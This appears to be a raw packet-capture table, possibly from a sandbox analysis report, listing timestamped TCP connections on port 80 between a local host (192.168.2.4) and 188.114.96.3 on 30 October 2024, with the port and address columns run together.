                                                        Oct 30, 2024 05:24:24.251646042 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.480067968 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.527297974 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.678530931 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.730432034 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.811752081 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.812819958 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.817364931 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.817435980 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.818164110 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.818247080 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.818327904 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:24.823587894 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.168451071 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.174305916 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.406235933 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.566858053 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.708873034 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.848030090 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.849183083 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.853919029 CET8050167188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.854038954 CET5016780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.854646921 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:25.854794979 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.855091095 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:25.860402107 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.202219009 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.207648039 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.457252026 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.511738062 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.661695957 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.714809895 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.746793985 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.747765064 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.752527952 CET8050168188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.752592087 CET5016880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.753127098 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.753192902 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.753258944 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.758522987 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.790112019 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.791155100 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.796437979 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.796506882 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.796607018 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:26.801873922 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:26.838866949 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.152565956 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.158056974 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.224982977 CET8050169188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.225100040 CET5016980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.482115984 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.576778889 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.595802069 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.683557987 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.710004091 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.714797020 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.716027975 CET8050170188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.716228962 CET5017080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.720098972 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:27.720333099 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.720427990 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:27.725676060 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.074345112 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.079910994 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.316744089 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.371042013 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.507952929 CET8050171188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.558564901 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.753664017 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.759079933 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:28.759138107 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.759349108 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:28.764579058 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.108783007 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.114145041 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.345716000 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.480432987 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.555949926 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.678982019 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.678981066 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684340954 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.684619904 CET8050172188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:29.684715033 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684717894 CET5017280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.684907913 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:29.698050022 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.043049097 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.048537016 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.322362900 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.371049881 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.526385069 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.574225903 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.646416903 CET5017180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.650768042 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.651171923 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656529903 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.656599998 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656632900 CET8050173188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:30.656677008 CET5017380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.656843901 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:30.662121058 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.011919975 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.017560959 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.259691000 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.310796976 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.455005884 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.496140003 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.568397999 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.570785046 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.574222088 CET8050174188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.574917078 CET5017480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.576170921 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.579185963 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.579288960 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.584559917 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.793477058 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.794785023 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.800123930 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.800909996 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.800909996 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.806186914 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.842920065 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.916912079 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.922290087 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:31.922354937 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.922445059 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:31.927804947 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.062247992 CET8050175188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.062305927 CET5017580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.152529001 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.158142090 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.158159018 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.277461052 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.282912016 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.410773039 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.464812994 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.517329931 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.642281055 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.724236965 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.724338055 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.724390984 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.728512049 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.865170002 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.865252972 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.866343975 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.870845079 CET8050176188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.870896101 CET5017680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871368885 CET8050177188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.871412992 CET5017780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871664047 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:32.871720076 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.871874094 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:32.877171993 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.230667114 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:33.236141920 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.459433079 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.645888090 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:33.985563040 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.985579014 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:33.985657930 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.109709978 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.110639095 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.115390062 CET8050178188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.115436077 CET5017880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.115863085 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.115933895 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.116043091 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.121289015 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.464961052 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:34.470374107 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.712635994 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:34.761686087 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.010481119 CET8050179188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.058873892 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.132802963 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.138170958 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.138670921 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.138870001 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.144282103 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.496923923 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.502264023 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.725440025 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:35.861990929 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:35.957897902 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.134246111 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.184633017 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.191059113 CET8050180188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.191812992 CET5018080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.192150116 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.197515011 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.199542999 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.207350016 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.212609053 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.558720112 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.564126015 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.803929090 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:36.855470896 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:36.996722937 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.042957067 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.114708900 CET5017980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.115734100 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.118875027 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.121530056 CET8050181188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.121757030 CET5018180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.124301910 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.124372005 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.124475002 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.130101919 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.483165979 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.488656998 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.731395006 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.734805107 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.736987114 CET8050182188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.737360001 CET5018280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.740127087 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.740216970 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.740346909 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.745590925 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.850933075 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.856271029 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:37.856353998 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.856498003 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:37.861745119 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.090147018 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.095568895 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.095916986 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.214988947 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.220360994 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.337258101 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.414067030 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.462440014 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.511749029 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.648967981 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.680641890 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:38.730480909 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:38.803601027 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.087171078 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.087593079 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.091350079 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.097100019 CET8050183188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.097647905 CET5018380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.097970963 CET8050184188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.098042011 CET5018480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.100980997 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.101536989 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.101764917 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.110048056 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.449322939 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.454687119 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.709834099 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.886743069 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:39.903039932 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.903085947 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:39.903198004 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.034353018 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.035494089 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040291071 CET8050185188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.040338993 CET5018580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040786982 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.040844917 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.040966988 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.046894073 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.386975050 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.392383099 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.627861977 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:40.744354010 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:40.969046116 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.086132050 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.091154099 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.091929913 CET8050186188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.092056990 CET5018680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.096519947 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.098946095 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.099179029 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.104482889 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.479017019 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.484373093 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.686750889 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.731359005 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:41.994201899 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.994299889 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:41.994340897 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.142237902 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.142658949 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.147959948 CET8050187188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.147995949 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.148013115 CET5018780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.148066044 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.148202896 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.153656006 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.496176958 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.501465082 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.746047020 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.864937067 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:42.948971987 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.949212074 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:42.955369949 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.070971966 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.070979118 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.076379061 CET8050189188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.076596975 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.076634884 CET8050188188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.076833963 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.076833010 CET5018880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.082246065 CET8050189188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.435015917 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.440505028 CET8050189188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.653805017 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.653808117 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.659342051 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.659701109 CET8050189188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.662987947 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.662987947 CET5018980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.663116932 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.668461084 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.774852991 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.780211926 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:43.783107042 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.783107042 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:43.788450956 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.011873960 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.017414093 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.017460108 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.146219969 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.151707888 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.270170927 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.324238062 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.403800964 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.475295067 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.527362108 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.537080050 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.588856936 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.588871002 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.588926077 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.718575001 CET5019080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.718784094 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.720206976 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.725610971 CET8050190188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.725657940 CET5019080192.168.2.4188.114.96.3
